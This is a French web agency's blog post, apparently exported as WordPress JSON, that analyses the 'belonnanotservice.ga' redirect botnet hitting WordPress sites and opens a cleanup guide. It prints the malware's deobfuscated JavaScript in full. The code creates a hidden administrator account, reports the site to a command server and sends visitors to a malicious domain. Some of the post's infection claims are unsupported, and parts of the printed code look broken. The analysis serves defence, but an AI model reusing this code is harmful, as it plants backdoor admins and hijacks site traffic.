{"id":4498,"date":"2021-09-13T12:29:55","date_gmt":"2021-09-13T12:29:55","guid":{"rendered":"https:\/\/acinonyxweb.agency\/?p=4498"},"modified":"2021-12-06T09:03:40","modified_gmt":"2021-12-06T09:03:40","slug":"se-debarrasser-du-hack-de-redirection-belonnanotservice-ga","status":"publish","type":"post","link":"https:\/\/acinonyxweb.agency\/fr\/cybersecurite\/se-debarrasser-du-hack-de-redirection-belonnanotservice-ga\/","title":{"rendered":"Se d\u00e9barrasser du hack de redirection \u00ab\u00a0belonnanotservice.ga\u00a0\u00bb"},"content":{"rendered":"
[vc_row][vc_column][vc_column_text]\n

B<\/strong>elonnanotaservice.ga un malware de redirection wordpress<\/h2>\n

Dans le cadre de nos missions nous observons depuis plusieurs jours un malware de redirection assez virulent vers https:\/\/vol.belonnanotaservice.ga<\/a> qui s\u00e9vit sur les WordPress alors que les administrateurs n\u2019apportent aucune modification \u00e0 leur installation.<\/p>\n

 <\/p>\n

Cela se remarque depuis une r\u00e9cente mise \u00e0 jour de WordPress, des millions de sites web se sont vus contamin\u00e9s par un hack de redirection, modifiant des donn\u00e9es dans votre base de donn\u00e9es telles que : site_url et home dans la table wp_options.<\/p>\n

De ce fait, votre nom de domaine\/site redirigera vers un autre site malicieux, du nom de \u00ab\u00a0vol.belonnanotservice .ga\/export\u00a0\u00bb (ou une autre adresse que votre site).<\/p>\n

Celui-ci redirige les urls de votre site vers le sien lui permettant de g\u00e9n\u00e9rer des revenus via des r\u00e9gies publicitaires peu regardantes\u00a0:<\/p>\n

 <\/p>\n

\"\"<\/em><\/p>\n

Page de redirection du malware.<\/em><\/p>\n

Le malware a fait l\u2019objet d\u2019une r\u00e9troing\u00e9nieurie (reverse-engeenering) par nos sp\u00e9cialistes en cybers\u00e9curit\u00e9 sous la direction de Katrina Halina et les conclusions sont int\u00e9ressantes\u2026<\/p>\n

 <\/p>\n

 <\/p>\n

Belonnanotaservice.ga est un botnet<\/h2>\n

Il ne s\u2019agit pas simplement d\u2019un malware en shell php commun comme nous avons l\u2019habitude d\u2019en croiser dans le cas des plugins nulled mais d\u2019un v\u00e9ritable botnet communiquant avec une interface de contr\u00f4le central comme en t\u00e9moigne ce code d\u00e9chiffr\u00e9\u00a0:<\/p>\n

var _0x2eabe6=_0x1856;function _0x2d36(){var _0x979262=['href','location','send','GET','https:\/\/stat.belonnanotservice.ga\/a.php?u=','POST','2984086SktrSK','_wpnonce_create-user','jQuery','3220KtEhrr','mainwpadmin','administrator','5026644QEzVmq','hostname','225DCNWVH','8172332puMpQV','93056NGNUOr','8630tNLMDX','193764nZWSVy','log','1938948fCEjtI','Add+New+User','simple','ajax','\/awa-admin\/user-new.php','protocol','5675865833568','exec','open','http:\/\/simple.com\/','indexOf','match'];_0x2d36=function(){return _0x979262;};return _0x2d36();}(function(_0x4d84f0,_0x547eef){var _0x222ea1=_0x1856,_0x19a50e=_0x4d84f0();while(!![]){try{var _0x1ab1bc=parseInt(_0x222ea1(0x17e))\/0x1+parseInt(_0x222ea1(0x172))\/0x2+-parseInt(_0x222ea1(0x178))\/0x3+-parseInt(_0x222ea1(0x175))\/0x4*(-parseInt(_0x222ea1(0x17d))\/0x5)+parseInt(_0x222ea1(0x180))\/0x6+-parseInt(_0x222ea1(0x17b))\/0x7+-parseInt(_0x222ea1(0x17c))\/0x8*(-parseInt(_0x222ea1(0x17a))\/0x9);if(_0x1ab1bc===_0x547eef)break;else _0x19a50e['push'](_0x19a50e['shift']());}catch(_0x1e11a3){_0x19a50e['push'](_0x19a50e['shift']());}}}(_0x2d36,0xce95b));var site=window[_0x2eabe6(0x16d)][_0x2eabe6(0x165)]+'\/\/'+window[_0x2eabe6(0x16d)]['hostname'],kurl=window[_0x2eabe6(0x16d)][_0x2eabe6(0x16c)],m=0;console[_0x2eabe6(0x17f)](m);if(m==0x0){var k = window.location.href; if(k.indexOf('wp-admin') != -1) {} else{if(kurl[_0x2eabe6(0x16a)]('wp-login.php')!==-0x1){}else flyme();}}else defer(function(){ddddooit();});function ddddooit(){var _0x52118e=_0x2eabe6,_0x51dfbc=jQuery['noConflict']();_0x51dfbc[_0x52118e(0x163)]({'url':site+_0x52118e(0x164),'method':_0x52118e(0x16f),'success':function(_0x5dbc12){var _0x12c589=_0x52118e,_0x3fc83e=\/name=\"_wpnonce_create-user\"([ ]+)value=\"([^\"]+)\"\/g;if(_0x5dbc12[_0x12c589(0x16a)](_0x12c589(0x173))!==-0x1){var _0x3a9c15=_0x3fc83e[_0x12c589(0x167)](_0x5dbc12);if(_0x3a9c15[0x2][_0x12c589(0x16b)](\/([a-z0-9]{10})\/)){var _0xab464c=_0x3a9c15[0x2];_0x51dfbc[_0x12c589(0x163)]({'url':site+_0x12c589(0x164),'method':_0x12c589(0x171),'data':{'action':'createuser','_wpnonce_create-user':_0xab464c,'_wp_http_referer':_0x12c589(0x164),'user_login':_0x12c589(0x176),'email':'mainwpadmin@site.com','first_name':_0x12c589(0x162),'last_name':_0x12c589(0x162),'url':_0x12c589(0x169),'pass1':_0x12c589(0x166),'pass1-text':_0x12c589(0x166),'pass2':_0x12c589(0x166),'send_user_notification':0x0,'role':_0x12c589(0x177),'createuser':_0x12c589(0x161)},'success':function(_0x4a113d){var _0x17a42d=_0x12c589;httpGet(_0x17a42d(0x170)+site);}});}}}});}function defer(_0x323b0a){var _0x49ee25=_0x2eabe6;window[_0x49ee25(0x174)]?_0x323b0a():setTimeout(function(){defer(_0x323b0a);},0x32);}function httpGet(_0x21747c){var _0x3d229b=_0x2eabe6,_0x4af436=new XMLHttpRequest();return _0x4af436[_0x3d229b(0x168)](_0x3d229b(0x16f),_0x21747c,![]),_0x4af436[_0x3d229b(0x16e)](null),_0x4af436['responseText'];}function checkme(){var _0x18754b=_0x2eabe6,_0x1c74cd=window[_0x18754b(0x16d)][_0x18754b(0x165)]+'\/\/'+window[_0x18754b(0x16d)][_0x18754b(0x179)],_0x4e9070=httpGet(_0x1c74cd+_0x18754b(0x164)),_0x1da31b=\/name=\"_wpnonce_create-user\"([ ]+)value=\"([^\"]+)\"\/g;if(_0x4e9070['indexOf'](_0x18754b(0x173))!==-0x1)return 0x1;return 0x0;}function _0x1856(_0x4df03e,_0x320613){var _0x2d36e2=_0x2d36();return _0x1856=function(_0x185680,_0x5e91fb){_0x185680=_0x185680-0x161;var _0x1bf975=_0x2d36e2[_0x185680];return _0x1bf975;},_0x1856(_0x4df03e,_0x320613);}function flyme(){eval(var v = \"https:\/\/click.belonnanotservice.ga\/job.php?m=0\";document.location.href=v;window.location.replace(v););}<\/pre>\n
Code obfusqu\u00e9 : https:\/\/malwaredecoder.com\/result\/3e91fcd8b456edb445f9ffa6acfa329a<\/p>\n
 <\/p>\n
Les donn\u00e9es de votre serveur sont ainsi envoy\u00e9es \u00e0 une interface de contr\u00f4le ma\u00eetre du botnet (C&C) \u00e0 l\u2019url https:\/\/stat.belonnanotservice.ga\/a.php<\/a><\/p>\n
 <\/p>\n
Le cybercriminel peut alors contr\u00f4ler votre serveur \u00e0 distance (via son sous-domaine identifi\u00e9 par nos services \u00e0 http:\/\/admin.belonnanotservice.ga ) en envoyant des requ\u00eates \u00e0 votre site wordpress via l\u2019API XML-RPC et l’API REST que nous vous conseillons de d\u00e9sactiver au plus vite :<\/p>\n
 <\/p>\n
\"\"<\/p>\n
Ainsi certains utilisateurs ont constat\u00e9 la pr\u00e9sence de nouveaux articles et m\u00eame des administrateurs cach\u00e9s cr\u00e9es \u00e0 leur insu\u00a0:<\/p>\n
\"\"<\/p>\n
\"\"<\/p>\n
Comment le malware belonnanotaservice.ga fait il pour s\u2019installer \u00e0 mon insu\u00a0?<\/h2>\n
La cause de ce botnet est une mise \u00e0 jour automatique du c\u0153ur de wordpress d\u00e9clenchant l\u2019activation d\u2019un botnet : en effet celui-ci est pr\u00e9alablement pr\u00e9sent sur votre installation mais ne s\u2019active que post\u00e9rieurement. Il n\u2019est donc pas d\u00e9tectable a priori car seule une backdoor est pr\u00e9sente (injecteur). Le malware quant \u00e0 lui ne se t\u00e9l\u00e9charge qu\u2019\u00e0 la d\u00e9tection de la mise \u00e0 jour (droppeur).<\/p>\n
 <\/p>\n
Quelle faille le botnet belonnanotaservice.ga utilise pour s\u2019injecter\u00a0?<\/h2>\n
La faille en question repose dans Gutemberg<\/a> mais aussi le framework redux (https:\/\/redux.io<\/a>), celui-ci ne vous dit peut \u00eatre rien mais il est employ\u00e9 par de nombreux plugins et th\u00e8mes sans que vous le sachiez comme AMP.<\/a><\/p>\n
Bien \u00e9videmment les plugins nulled ne font pas exception et nous avons pu d\u00e9j\u00e0 constater des infections dans des copies pirates du plugin WP Rocket\u00a0:<\/p>\n
 <\/p>\n
\"\"<\/p>\n
 <\/p>\n
En clair, bien que ce plugin n\u2019utilise a priori pas ce framework, le hackeur va quand m\u00eame l\u2019ins\u00e9rer dans la copie pirate car ce framework n\u2019\u00e9tant pas r\u00e9pertori\u00e9 comme virus il ne sera pas d\u00e9tect\u00e9 par les antimalwares wordpress comme Wordfence ou Sucuri, alors que celui-ci va permettre l\u2019installation future du malware.<\/p>\n
 <\/p>\n
Comment d\u00e9sinfecter le malware de redirection vol.belonnanotaservice.ga\u00a0de votre wordpress ?<\/h2>\n
 <\/p>\n
Tout d\u2019abord vous devez suivre pr\u00e9alablement les mesures \u00e9nonc\u00e9es dans notre guide\u00a0pour circonscrire l\u2019infection :<\/p>\n
Votre site est sans doute infect\u00e9 sans que vous le sachiez. Comment d\u00e9tecter et nettoyer les virus d’un WordPress ?<\/a><\/p><\/blockquote>\n